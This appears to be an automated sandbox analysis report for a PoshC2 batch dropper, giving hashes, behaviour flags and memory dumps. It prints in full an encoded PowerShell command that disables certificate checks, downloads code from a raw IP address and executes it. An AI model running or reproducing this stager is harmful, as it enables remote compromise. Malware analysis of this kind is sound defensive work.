56b823c64968f9eb87a57b688e569eb7040501f291be4606cb226ff281eaffb4

Analysis

max time kernel
147s
max time network
150s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
20/09/2022, 10:10

Target

PoshC2.bat
Size

788B
MD5

96f8a516919536f8f3da32bc5eb58bda
SHA1

7e13fa91b8085fa48269475e413c22e55716f59e
SHA256

56b823c64968f9eb87a57b688e569eb7040501f291be4606cb226ff281eaffb4
SHA512

464ddfec07671b295ee3dcfe44c48c428fde6f6c02548a3d9ede77c5f1e7d59c23b018faaf5bfc1eb1f10aa34674a3c329529d585b84b08e30d397c72c76dbc3

Score

10^/10

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://95.213.145.101/uasclient/0.1.34/modules/_rp

Blocklisted process makes network request 26 IoCs

Suspicious behavior: EnumeratesProcesses 6 IoCs

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1984	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 544 wrote to memory of 1984	544	cmd.exe	27
PID 544 wrote to memory of 1984	544	cmd.exe	27
PID 544 wrote to memory of 1984	544	cmd.exe	27

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\PoshC2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AOQA1AC4AMgAxADMALgAxADQANQAuADEAMAAxAC8AdQBhAHMAYwBsAGkAZQBuAHQALwAwAC4AMQAuADMANAAvAG0AbwBkAHUAbABlAHMALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA=
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1984

memory/1984-55-0x000007FEFBB21000-0x000007FEFBB23000-memory.dmp

Filesize
8KB

Download
memory/1984-56-0x000007FEF37A0000-0x000007FEF41C3000-memory.dmp

Filesize
10.1MB

Download
memory/1984-58-0x0000000002264000-0x0000000002267000-memory.dmp

Filesize
12KB

Download
memory/1984-57-0x000007FEF2C40000-0x000007FEF379D000-memory.dmp

Filesize
11.4MB

Download
memory/1984-59-0x000000001B840000-0x000000001BB3F000-memory.dmp

Filesize
3.0MB

Download
memory/1984-60-0x000000000226B000-0x000000000228A000-memory.dmp

Filesize
124KB

Download
memory/1984-61-0x0000000002264000-0x0000000002267000-memory.dmp

Filesize
12KB

Download
memory/1984-62-0x000000000226B000-0x000000000228A000-memory.dmp

Filesize
124KB

Download